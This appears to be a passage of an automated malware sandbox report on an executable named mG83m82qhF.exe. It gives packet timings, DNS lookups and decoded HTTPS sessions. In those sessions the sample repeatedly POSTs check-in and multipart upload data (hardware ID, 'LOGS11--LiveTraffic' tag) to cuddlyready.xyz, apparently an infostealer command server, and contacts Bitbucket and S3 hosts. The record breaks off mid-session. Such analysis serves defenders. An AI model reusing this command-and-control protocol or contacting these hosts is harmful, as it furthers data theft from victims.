                                                                                                                                                                              Dec 23, 2024 08:31:52.326103926 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.326138973 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.326145887 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.326170921 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.327754974 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.327776909 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.327807903 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.327815056 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.327836037 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.329540968 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.329557896 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.329612970 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.329621077 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.331059933 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.331127882 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.331161022 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.331172943 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.331196070 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.331955910 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.331974030 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.332025051 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.332035065 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.333682060 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.333720922 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.333746910 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.333758116 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.333769083 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.333806038 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.335344076 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.335365057 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.335400105 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.335405111 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.335412025 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.335448980 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.336177111 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.336858988 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.336875916 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.336904049 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.336926937 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.336934090 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.336951971 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.336967945 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.431026936 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.431058884 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.431094885 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.431111097 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.431144953 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.431160927 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.437383890 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.437412024 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.437452078 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.437464952 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.437484980 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.443681002 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.443701982 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.443747997 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.443767071 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.443785906 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.449953079 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.450015068 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.450032949 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.450046062 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.450067043 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.456195116 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.456240892 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.456276894 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.456285000 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.456307888 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.462225914 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.462282896 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.462318897 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.462332964 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.462342024 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.462379932 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.467798948 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.467820883 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.467904091 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.467916965 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.467955112 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.468302965 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.473109961 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.473131895 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.473169088 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.473187923 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.473208904 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.518140078 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.518162012 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.565001011 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.582283020 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.600168943 CET49775443192.168.2.1052.217.136.89
                                                                                                                                                                              Dec 23, 2024 08:31:52.625947952 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.625963926 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.626015902 CET4434977552.217.136.89192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:31:52.626040936 CET49775443192.168.2.1052.217.136.89
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 08:31:22.992674112 CET | 55420 | 53 | 192.168.2.10 | 1.1.1.1
Dec 23, 2024 08:31:23.129875898 CET | 53 | 55420 | 1.1.1.1 | 192.168.2.10
Dec 23, 2024 08:31:46.073316097 CET | 49934 | 53 | 192.168.2.10 | 1.1.1.1
Dec 23, 2024 08:31:46.209882021 CET | 53 | 49934 | 1.1.1.1 | 192.168.2.10
Dec 23, 2024 08:31:48.320728064 CET | 56224 | 53 | 192.168.2.10 | 1.1.1.1
Dec 23, 2024 08:31:48.631115913 CET | 53 | 56224 | 1.1.1.1 | 192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 23, 2024 08:31:22.992674112 CET | 192.168.2.10 | 1.1.1.1 | 0x4343 | Standard query (0) | cuddlyready.xyz | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:31:46.073316097 CET | 192.168.2.10 | 1.1.1.1 | 0x2f3 | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:31:48.320728064 CET | 192.168.2.10 | 1.1.1.1 | 0x3e65 | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 08:31:23.129875898 CET | 1.1.1.1 | 192.168.2.10 | 0x4343 | No error (0) | cuddlyready.xyz | | 172.67.150.173 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:31:23.129875898 CET | 1.1.1.1 | 192.168.2.10 | 0x4343 | No error (0) | cuddlyready.xyz | | 104.21.32.96 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:31:46.209882021 CET | 1.1.1.1 | 192.168.2.10 | 0x2f3 | No error (0) | bitbucket.org | | 185.166.143.49 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:31:46.209882021 CET | 1.1.1.1 | 192.168.2.10 | 0x2f3 | No error (0) | bitbucket.org | | 185.166.143.50 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:31:46.209882021 CET | 1.1.1.1 | 192.168.2.10 | 0x2f3 | No error (0) | bitbucket.org | | 185.166.143.48 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:31:48.631115913 CET | 1.1.1.1 | 192.168.2.10 | 0x3e65 | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 08:31:48.631115913 CET | 1.1.1.1 | 192.168.2.10 | 0x3e65 | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 08:31:48.631115913 CET | 1.1.1.1 | 192.168.2.10 | 0x3e65 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.136.89 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:31:48.631115913 CET | 1.1.1.1 | 192.168.2.10 | 0x3e65 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.160.161 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:31:48.631115913 CET | 1.1.1.1 | 192.168.2.10 | 0x3e65 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.25.111 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:31:48.631115913 CET | 1.1.1.1 | 192.168.2.10 | 0x3e65 | No error (0) | s3-w.us-east-1.amazonaws.com | | 16.15.194.140 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:31:48.631115913 CET | 1.1.1.1 | 192.168.2.10 | 0x3e65 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.25.126 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:31:48.631115913 CET | 1.1.1.1 | 192.168.2.10 | 0x3e65 | No error (0) | s3-w.us-east-1.amazonaws.com | | 16.182.74.113 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:31:48.631115913 CET | 1.1.1.1 | 192.168.2.10 | 0x3e65 | No error (0) | s3-w.us-east-1.amazonaws.com | | 54.231.230.105 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:31:48.631115913 CET | 1.1.1.1 | 192.168.2.10 | 0x3e65 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.49.228 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                              • cuddlyready.xyz
                                                                                                                                                                              • bitbucket.org
                                                                                                                                                                              • bbuseruploads.s3.amazonaws.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49709 | 172.67.150.173 | 443 | 7704 | C:\Users\user\Desktop\mG83m82qhF.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:31:24 UTC | 262 | OUT | POST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                              Host: cuddlyready.xyz
2024-12-23 07:31:24 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                              Data Ascii: act=life
2024-12-23 07:31:25 UTC | 1122 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 23 Dec 2024 07:31:25 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=u9nkdp42olf2ckpu2o6q5fgobt; expires=Fri, 18 Apr 2025 01:18:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hvjr6%2BV5hNemXd0ASOXUGuRvSogQ1HVHzJXaWvrnSRjb0jtoHOqKSSvguzrxC3CTmJ2Sfq2oNxZZbRsehETrz96P%2F8jrFiezQJfSDFNyKJD3g62FZX7mHxncXDePTLXMLXw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f66a6deefabc3ff-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1464&min_rtt=1455&rtt_var=564&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1910994&cwnd=246&unsent_bytes=0&cid=a2d8156e6b5890f2&ts=1028&x=0"
2024-12-23 07:31:25 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                              Data Ascii: 2ok
2024-12-23 07:31:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49715 | 172.67.150.173 | 443 | 7704 | C:\Users\user\Desktop\mG83m82qhF.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:31:26 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 53
                                                                                                                                                                              Host: cuddlyready.xyz
2024-12-23 07:31:26 UTC | 53 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-23 07:31:27 UTC | 1123 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 23 Dec 2024 07:31:27 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=bvv62nvr9hjccnk5vg9v8n11mp; expires=Fri, 18 Apr 2025 01:18:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sw1dUWobgvRpH3xUfdCwg4Fzzi61F%2B81qyGrmg6kQ3Y6FfNY4vFZ2Q5Qt%2F1Tc9zLILNDp18hxKz18bjX6O2FZj9kfJMMoHxEZLoJUquZGC2MPHdPk7qMgwqwMhnInV%2FuVk4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f66a6ecfad48c1d-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1875&min_rtt=1846&rtt_var=713&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=952&delivery_rate=1581798&cwnd=174&unsent_bytes=0&cid=45f403ae00c59927&ts=793&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49721 | 172.67.150.173 | 443 | 7704 | C:\Users\user\Desktop\mG83m82qhF.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:31:29 UTC | 282 | OUT | POST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: multipart/form-data; boundary=K9DFO6OSNV4Y2XTIIPM
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 12859
                                                                                                                                                                              Host: cuddlyready.xyz
2024-12-23 07:31:29 UTC | 12859 | OUT | Data Raw: 2d 2d 4b 39 44 46 4f 36 4f 53 4e 56 34 59 32 58 54 49 49 50 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 32 33 38 35 46 34 37 43 46 46 44 45 46 35 35 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4b 39 44 46 4f 36 4f 53 4e 56 34 59 32 58 54 49 49 50 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 39 44 46 4f 36 4f 53 4e 56 34 59 32 58 54 49 49 50 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69
                                                                                                                                                                              Data Ascii: --K9DFO6OSNV4Y2XTIIPMContent-Disposition: form-data; name="hwid"82385F47CFFDEF55AC8923850305D13E--K9DFO6OSNV4Y2XTIIPMContent-Disposition: form-data; name="pid"2--K9DFO6OSNV4Y2XTIIPMContent-Disposition: form-data; name="lid"LOGS11--Li
2024-12-23 07:31:30 UTC | 1123 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 23 Dec 2024 07:31:30 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=na0g47qbitniiou9esek1i0m9v; expires=Fri, 18 Apr 2025 01:18:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ADbfGfogkX4bte5WvYfq7MYFBKoD3Amfo1YSHIT12XAIYGdbnF3hCqn8pTfGAopCZmFX6K1SssyDwJrS8j3Tfoh945TtYJPf3CouO7KJtgWxo7%2BEbJ45Sp6nwJNfhZ6k1ys%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f66a6fc9acd43ed-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2208&min_rtt=2122&rtt_var=969&sent=9&recv=16&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13799&delivery_rate=1036563&cwnd=205&unsent_bytes=0&cid=98a481e9648499a7&ts=1281&x=0"
2024-12-23 07:31:30 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                              Data Ascii: fok 8.46.123.189
2024-12-23 07:31:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.10 | 49727 | 172.67.150.173 | 443 | 7704 | C:\Users\user\Desktop\mG83m82qhF.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:31:31 UTC | 278 | OUT | POST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: multipart/form-data; boundary=2NP6G25QLXUCTB6
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 15062
                                                                                                                                                                              Host: cuddlyready.xyz
2024-12-23 07:31:31 UTC | 15062 | OUT | Data Raw: 2d 2d 32 4e 50 36 47 32 35 51 4c 58 55 43 54 42 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 32 33 38 35 46 34 37 43 46 46 44 45 46 35 35 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 32 4e 50 36 47 32 35 51 4c 58 55 43 54 42 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 4e 50 36 47 32 35 51 4c 58 55 43 54 42 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d
                                                                                                                                                                              Data Ascii: --2NP6G25QLXUCTB6Content-Disposition: form-data; name="hwid"82385F47CFFDEF55AC8923850305D13E--2NP6G25QLXUCTB6Content-Disposition: form-data; name="pid"2--2NP6G25QLXUCTB6Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
2024-12-23 07:31:32 UTC | 1124 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 23 Dec 2024 07:31:32 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=9o5o4bbv35c5a0m80adbujbd00; expires=Fri, 18 Apr 2025 01:18:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qEBxo30ye7zVWImtY8IAJ2OYXmFgR4HfcrSJsnrHhr70d5vzpEbTRF9ZuwLwwMPbYsQL3b1GnfVM2IicNpbtdQT0Jhnh1LL%2BxQbb8puvoVVweOnUEf74EbBour6t9VM51t4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f66a70ccf957cea-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1784&min_rtt=1780&rtt_var=677&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2836&recv_bytes=15998&delivery_rate=1606160&cwnd=226&unsent_bytes=0&cid=cf5c46cbd4893037&ts=1171&x=0"
2024-12-23 07:31:32 UTC  20  IN  Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 07:31:32 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
4  192.168.2.10  49733  172.67.150.173  443  7704  C:\Users\user\Desktop\mG83m82qhF.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-23 07:31:34 UTC  275  OUT  POST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: multipart/form-data; boundary=O1N2OO66DWA6
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 20406
                                                                                                                                                                              Host: cuddlyready.xyz
